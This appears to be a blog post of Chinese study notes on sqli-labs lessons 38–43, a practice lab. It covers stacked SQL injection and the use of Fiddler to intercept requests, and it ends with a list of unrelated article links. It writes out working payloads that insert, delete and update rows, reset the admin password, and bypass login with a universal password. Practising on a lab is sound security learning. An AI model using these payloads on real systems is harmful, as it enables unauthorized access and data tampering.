sqli-labs学习笔记 DAY8
DAY 8
sqli-lab Page-3
sqli-labs lesson 38
- What is Stacked injection?
https://blog.csdn.net/Fly_hps/article/details/80288678 - SQL插入语句:
INSERT INTO table_name (column1,column2,column3,...) VALUES (value1,value2,value3,...);
或者
INSERT INTO table_name VALUES (value1,value2,value3,...);
- payload构建:
?id=1';insert into users values (99,'test','test')--+
- 注:闭合符号、表名以及字段可以通过之前学习的方法获得。
- 结果:
sqli-labs lesson 39
- SQL删除语句:
DELETE FROM table_name WHERE some_column=some_value;
- 跟上一题一样,只不过是数值型的参数,我们用delete语句把上次插入的记录删除
- payload构建:
?id=1;delete from users where id=99--+
- 结果:
sqli-labs lesson 40
- SQL更新语句:
UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value;
- 利用联合查询或者盲注获得闭合符号、数据库名、表名、字段名等,更新id=1的密码
- payload:
?id=99') UNION SELECT 1,2,3;update users set password='god' where id=1--+
- 结果:
sqli-labs lesson 41
- 跟上一题一样,只不过是数值型注入
sqli-labs lesson 42
- 万能密码:
- 用户名:随意
- 密码:
0' or 1=1;#
- 结果:直接登录id=1的账号
- Stacked Injection:
- 抓包:这里用Fiddler
- 改包:密码改为
1';update users set password='test' where username='admin'#
- 结果:成功更改了admin账号的密码
- 抓包:这里用Fiddler
sqli-labs lesson 43
- 这一题与上一题一样,闭合符号是’)
Fiddler使用
- 下载与安装:https://www.telerik.com/fiddler
- 界面:
- 抓包:
- 快捷键F12打开抓包(默认为8888端口),出现该图标即已经打开。
- 抓包结果在左侧。点击后左侧新增一个记录,打开后可以修改请求。
- 修改完毕,点击
sqli-labs学习笔记 DAY8的更多相关文章
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- JS学习笔记Day8
一.内置函数Math 1.Math 1)Math.abs() 求绝对值 2)Math.PI 圆周率 2.求近似值: 1)Math.round() 四舍五入(负数: >0.5 进一 <=0. ...
- HTML学习笔记Day8
一.设置元素背景透明属性{background:rgba(255,255,255,0.5):} 1.元素背景透明,内容正常显示: 注:opacity:value:元素背景透明内容也透明: 2.rgba ...
- Python学习笔记 - day8 - 异常
异常 在程序运行过程中,总会遇到各种各样的错误.有的错误是程序编写有问题造成的,比如本来应该输出整数结果输出了字符串,有的错误是用户输入造成的,比如让用户输入email地址,结果得到一个空字符串,这种 ...
- 【目录】Python学习笔记
目录:Python学习笔记 目标:坚持每天学习,每周一篇博文 1. Python学习笔记 - day1 - 概述及安装 2.Python学习笔记 - day2 - PyCharm的基本使用 3.Pyt ...
- go语言,golang学习笔记1 官网下载安装,中文社区,开发工具LiteIDE
go语言,golang学习笔记1 官网下载安装,中文社区,开发工具LiteIDE Go语言是谷歌2009发布的专门针对多处理器系统应用程序的编程进行了优化,使用Go编译的程序可以媲美C或C++代码的速 ...
- C51学习笔记
转自:http://blog.csdn.net/gongyuan073/article/details/7856878 单片机C51学习笔记 一, C51内存结构深度剖析 二, reg51.头 ...
- R语言可视化学习笔记之添加p-value和显著性标记
R语言可视化学习笔记之添加p-value和显著性标记 http://www.jianshu.com/p/b7274afff14f?from=timeline 上篇文章中提了一下如何通过ggpubr ...
- SQLi-Labs学习笔记
结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言.对于初学者,数据库仅仅是在客户端和服务端进行数据存储.SQL通过结构化查询,关系,面向对象编程等等来管理数据库.编程极客们总是搞出许 ...
随机推荐
- RLE Iterator LT900
Write an iterator that iterates through a run-length encoded sequence. The iterator is initialized b ...
- [转] Eclipse安装SVN插件
eclipse里安装SVN插件,一般来说,有三种方式: 1. 直接下载SVN插件,将其解压到eclipse的对应目录里 2. 使用eclipse 里Help菜单的“Install New Softwa ...
- 将本地项目托管到github 并预览
本地文件上传到github的步骤 1.先在github上建立一个仓库 2.将此仓库download 3.在此文件夹中git bash here 4.进行如下git操作 git git init git ...
- gitblit-1.8.0域认证
gitblit-1.8.0\data\defaults.properties # # DEFAULTS.PROPERTIES # # The default Gitblit settings. # # ...
- QoS policy-map class-map
QoS(Quality of ServiceQoS(Quality of Service,服务质量)指一个网络能够利用各种基础技术,为指定的网络通信提供更好的服务能力, 是网络的一种安全机制, 是用来 ...
- AWVS使用手册
目录: 0×00.什么是Acunetix Web Vulnarability Scanner ( What is AWVS?) 0×01.AWVS安装过程.主要文件介绍.界面简介.主要操作区域简介(I ...
- 【SAPUI5】ODataとは
はじめに SAPUI5でアプリケーションを作るにあたり.ODataは避けては通れないトピックです.結構広いテーマなので.5-7回くらいに分けて書きたいと思います.1回目はODataの概要について説明し ...
- WPF 学习笔记-设置属性使窗口不可改变大小
原文:WPF 学习笔记-设置属性使窗口不可改变大小 调整Windows下的ResizeMode属性: ResizeMode = NoResize Resize属性是控制Windows是否可以改变大小, ...
- BZOJ1190_梦幻岛宝珠_KEY
题目传送门 观察数据a*2^b,转化成二进制后,后面跟了b位的0,可以转化为一个分层背包. 先预处理出每个物品是哪一层的,并放在同层内DP. 同层内直接背包,考虑层与层之间的DP. 第一维枚举层数,然 ...
- 获取当前页面的所有链接的四种方法对比(python 爬虫)
''' 得到当前页面所有连接 ''' import requests import re from bs4 import BeautifulSoup from lxml import etree fr ...